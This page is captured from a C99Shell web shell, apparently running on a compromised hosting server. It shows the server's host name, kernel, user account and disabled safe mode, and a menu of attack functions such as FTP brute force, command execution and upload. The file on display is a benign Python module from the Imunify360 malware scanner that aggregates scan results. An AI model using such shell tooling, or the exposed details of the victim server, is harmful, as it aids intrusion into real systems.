!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/opt/imunify360/venv/lib/python3.11/site-packages/imav/malwarelib/scan/   drwxr-xr-x
Free 294.55 GB of 429.69 GB (68.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     scan_result.py (9.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"""
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License,
or (at your option) any later version.


This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License for more details.


You should have received a copy of the GNU General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.

Copyright © 2019 Cloud Linux Software Inc.

This software is also available under ImunifyAV commercial license,
see <https://www.imunify360.com/legal/eula>
"""
import asyncio
import logging
import time
from concurrent.futures.thread import ThreadPoolExecutor
from functools import wraps
from tempfile import NamedTemporaryFile
from typing import Any, Dict
from uuid import uuid4

from defence360agent.contracts.hook_events import HookEvent
from defence360agent.subsys.panels import hosting_panel
from defence360agent.utils import encode_filename
from imav.contracts.config import Malware
from imav.malwarelib.config import MalwareScanType
from imav.malwarelib.utils.user_list import fill_results_owner

# Module-wide logger, named after this module.
logger = logging.getLogger(__name__)

# Single-worker thread pool shared at module level.
_executor = ThreadPoolExecutor(max_workers=1)

# Keyword options that the file-list based scan decorator forwards to the
# wrapped scan function.
SCAN_OPTIONS = [
    "intensity_cpu",
    "intensity_io",
    "intensity_ram",
    "detect_elf",
    "use_filters",
]

# Keyword options forwarded by the direct scan decorator: everything in
# SCAN_OPTIONS plus the path-selection options.
DIRECT_SCAN_OPTIONS = SCAN_OPTIONS + [
    "follow_symlinks",
    "exclude_patterns",
    "file_patterns",
]

# Keyword options that are reported in the "scanning started" hook event.
SCAN_HOOK_PARAMS = [
    "file_patterns",
    "follow_symlinks",
    "exclude_patterns",
    "intensity_cpu",
    "intensity_io",
    "intensity_ram",
]


class ScanResult:
    """Mutable holder for the outcome of one malware scan.

    Stores the scan identity (path, id, type), optional start/stop
    timestamps, error information and the scan records, and renders them
    as a plain dict with a ``summary`` and a ``results`` section.
    """

    def __init__(self, path, scan_id, scan_type):
        self.scans = []
        self.total_files = 0
        self.error = None
        self.errors = []

        # Timestamps stay unset until set_start_stop() provides them.
        self._begin_time = None
        self._end_time = None
        self._aggregated_results = {}

        self._path = path
        self._scan_id = scan_id
        self._scan_type = scan_type
        self.args = None

    def is_detached(self):
        """Return True for background, on-demand and user scan types."""
        detached_types = (
            MalwareScanType.BACKGROUND,
            MalwareScanType.ON_DEMAND,
            MalwareScanType.USER,
        )
        return self._scan_type in detached_types

    def set_start_stop(self, begin_time=None, end_time=None):
        """Record the begin and/or end time of the scan.

        Falsy values (``None``, ``0``) are ignored, so a previously stored
        timestamp is never overwritten by them.
        """
        if begin_time:
            self._begin_time = begin_time
        if end_time:
            self._end_time = end_time

    def to_dict_initial(self):
        """Build the dict representation without the scan records.

        ``results`` is ``None`` for detached scans and an empty dict
        otherwise. ``args`` is only added to the summary when it is truthy.
        """
        summary = {
            "scanid": self._scan_id,
            "type": self._scan_type,
            "path": self._path,
            "started": self._begin_time,
            "completed": self._end_time,
            "total_files": self.total_files,
            "error": self.error,
            "errors": self.errors,
        }
        # 'complete_scan' needs an empty (not null) result for a scan
        # without files, hence the empty dict for non-detached scans.
        if self.is_detached():
            results = None
        else:
            results = {}
        # Args are left out entirely when they are not applicable.
        if self.args:
            summary["args"] = self.args
        return {"summary": summary, "results": results}

    def to_dict(self):
        """Build the dict representation with ``results`` set to the scans."""
        return {**self.to_dict_initial(), "results": self.scans}

    def _aggregate_result(self):
        """Replace ``self.scans`` with its per-file aggregation."""
        # NOTE(review): ``list(*self.scans)`` passes the elements of
        # ``self.scans`` as positional arguments to ``list()``, so it only
        # succeeds when ``self.scans`` holds at most one (iterable)
        # element. Confirm this matches what callers store in ``scans``.
        records = list(*self.scans)
        self.scans = aggregate_result(records)
        return self

    async def get(self):
        """Aggregate the scans, fill in their owners and return ``self``."""
        self._aggregate_result()
        await fill_results_owner(self.scans)
        return self


def aggregate_result(scans):
    """Group scan records by file name.

    Each record is a mapping with at least ``signature``, ``suspicious``,
    ``timestamp``, ``file_name``, ``size`` and ``hash`` keys. Records with
    a truthy ``ignore`` value are logged and skipped.

    Returns a dict keyed by file name. Each value carries the ``size``,
    ``hash``, ``ctime`` and ``modification_time`` of the first record seen
    for that file, plus a ``hits`` list in which non-suspicious hits come
    before suspicious ones.
    """
    by_file: Dict[str, Any] = {}

    for rec in scans:
        hit = {
            "matches": rec["signature"],
            "suspicious": rec["suspicious"],
            "extended_suspicious": rec.get("extended_suspicious", False),
            "timestamp": rec["timestamp"],
        }

        if rec.get("ignore"):
            logger.info(
                "File match for %s will be ignored: %s",
                rec["file_name"],
                hit,
            )
            continue

        # The file-level fields are read from every record, but they are
        # only stored for the first record of a given file name.
        file_entry = {
            "hits": [],
            "size": rec["size"],
            "hash": rec["hash"],
            "ctime": rec.get("ctime", 0),
            "modification_time": rec.get("modification_time", 0),
        }
        hits = by_file.setdefault(rec["file_name"], file_entry)["hits"]

        if rec.get("curable"):
            hit["curable"] = True

        # Non-suspicious hits go to the front, suspicious ones to the back.
        position = len(hits) if rec["suspicious"] else 0
        hits.insert(position, hit)

    return by_file


def event_hook(sink):
    """Decorator factory that reports scan start and shields scan failures.

    The decorated coroutine is called as
    ``f(path, scan_id=..., scan_type=..., **kwargs)``. Before the call, when
    ``scan_type`` is truthy, a ``HookEvent.MalwareScanningStarted`` message
    is passed to ``sink.process_message``. A missing ``scan_id`` is replaced
    with a fresh UUID hex string and a missing ``started`` with the current
    time. ``started`` is only used for the hook event and is not forwarded
    to ``f``.

    Any exception other than ``asyncio.CancelledError`` raised by ``f`` is
    logged and converted into a result dict whose summary carries
    ``repr()`` of the exception in ``error``.
    """

    def wrap(f):
        @wraps(f)
        async def wrapper(
            path, scan_id=None, scan_type=None, started=None, **kwargs
        ):
            if not scan_id:
                scan_id = uuid4().hex
            if not started:
                started = time.time()

            # Only the options listed in SCAN_HOOK_PARAMS are reported.
            hook_params = {
                name: value
                for name, value in kwargs.items()
                if name in SCAN_HOOK_PARAMS
            }

            if scan_type:
                await sink.process_message(
                    HookEvent.MalwareScanningStarted(
                        scan_id=scan_id,
                        scan_type=scan_type,
                        path=path,
                        started=started,
                        scan_params=hook_params,
                    )
                )

            # Start time reported in the failure summary below; taken just
            # before the wrapped call, independently of ``started``.
            call_started = time.time()
            try:
                return await f(
                    path, scan_id=scan_id, scan_type=scan_type, **kwargs
                )
            except asyncio.CancelledError:
                # Cancellation must always propagate to the caller.
                raise
            except Exception as exc:
                logger.exception("Scan wrapper task failed")
                return {
                    "summary": {
                        "scanid": scan_id,
                        "type": scan_type,
                        "path": path,
                        "total_files": 0,
                        "started": call_started,
                        "completed": time.time(),
                        "error": repr(exc),
                    },
                    "results": {},
                }

        return wrapper

    return wrap


class DirectAiBolit:
    """Decorator that runs a scan function directly on a path.

    The decorated coroutine is invoked as
    ``f(None, scan_type=..., scan_id=..., scan_path=path, **options)`` and
    must return a ``(scans, error)`` pair. The wrapper returns a
    ``ScanResult`` populated from that pair.
    """

    def __init__(self, *_, **__):
        # Accepts and ignores any arguments.
        pass

    @staticmethod
    async def _add_db_dir(home_dir, scan_options):
        """Add ``db_dir`` to *scan_options* when rapid scan is enabled."""
        if not Malware.RAPID_SCAN:
            return
        panel = hosting_panel.HostingPanel()
        scan_options["db_dir"] = panel.get_rapid_scan_db_dir(home_dir)

    @staticmethod
    def _extract_scan_options(kwargs):
        """Return the subset of *kwargs* named in DIRECT_SCAN_OPTIONS."""
        return {
            name: value
            for name, value in kwargs.items()
            if name in DIRECT_SCAN_OPTIONS
        }

    @staticmethod
    def _update_scan_options(kwargs):
        """Join the pattern lists into comma-separated strings, in place.

        ``exclude_patterns`` and ``file_patterns`` are converted only when
        present and not ``None``. The same dict object is returned.
        """
        for option in ("exclude_patterns", "file_patterns"):
            if kwargs.get(option) is not None:
                kwargs[option] = ",".join(kwargs[option])
        return kwargs

    def __call__(self, f):
        @wraps(f)
        async def wrapper(
            path, scan_id=None, scan_type=None, begin_time=None, **kwargs
        ):
            options = self._extract_scan_options(kwargs)
            options = self._update_scan_options(options)

            # The rapid-scan database directory is only considered for
            # user and background scans.
            uses_db_dir = scan_type in (
                MalwareScanType.USER,
                MalwareScanType.BACKGROUND,
            )
            if uses_db_dir:
                await self._add_db_dir(path, options)

            outcome = ScanResult(path, scan_id, scan_type)
            outcome.set_start_stop(begin_time=begin_time)

            raw_scans, outcome.error = await f(
                None,
                scan_type=scan_type,
                scan_id=scan_id,
                scan_path=path,
                **options,
            )
            # ``raw_scans`` is unpacked as the positional arguments of
            # ``list()``, i.e. it is expected to wrap a single iterable.
            outcome.scans = list(*raw_scans)
            return outcome

        return wrapper


class PrepareFileList:
    """Decorator that hands a scan function a temporary file-list file.

    The wrapper treats its ``path`` argument as an iterable of file names,
    writes them into a ``NamedTemporaryFile`` created in *tmpdir*, and
    calls the decorated coroutine as
    ``f(tmp_file, scan_type=..., scan_id=..., **options)``. The coroutine
    must return a ``(scans, error)`` pair; the wrapper returns a
    ``ScanResult`` populated from that pair and from the number of files
    written.
    """

    def __init__(self, tmpdir):
        self._tmpdir = tmpdir

    async def prepare_file(self, fname, files, **kwargs) -> int:
        """Write *files* to *fname* and return how many were written.

        Extra keyword arguments are accepted and ignored.
        """
        return self._write_list_to_file(fname, files)

    @staticmethod
    def _write_list_to_file(fname, files):
        """Write each entry of *files*, encoded, to *fname*; return the count.

        The file is opened in binary write mode and every entry is passed
        through ``encode_filename`` before being written.
        """
        written = 0
        with open(fname, "wb") as out:
            for written, name in enumerate(files, start=1):
                out.write(encode_filename(name))
        return written

    @staticmethod
    def _extract_scan_options(kwargs):
        """Return the subset of *kwargs* named in SCAN_OPTIONS."""
        return {
            name: value
            for name, value in kwargs.items()
            if name in SCAN_OPTIONS
        }

    def __call__(self, f):
        @wraps(f)
        async def wrapper(
            path, scan_id=None, scan_type=None, begin_time=None, **kwargs
        ):
            options = self._extract_scan_options(kwargs)
            outcome = ScanResult(path, scan_id, scan_type)
            outcome.set_start_stop(begin_time=begin_time)

            # The temporary file only needs to exist while the scan runs.
            with NamedTemporaryFile(dir=self._tmpdir) as list_file:
                file_count = await self.prepare_file(
                    list_file.name, path, **kwargs
                )
                raw_scans, outcome.error = await f(
                    list_file,
                    scan_type=scan_type,
                    scan_id=scan_id,
                    **options,
                )

            outcome.total_files = file_count
            # ``raw_scans`` is unpacked as the positional arguments of
            # ``list()``, i.e. it is expected to wrap a single iterable.
            outcome.scans = list(*raw_scans)
            return outcome

        return wrapper

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0977 ]--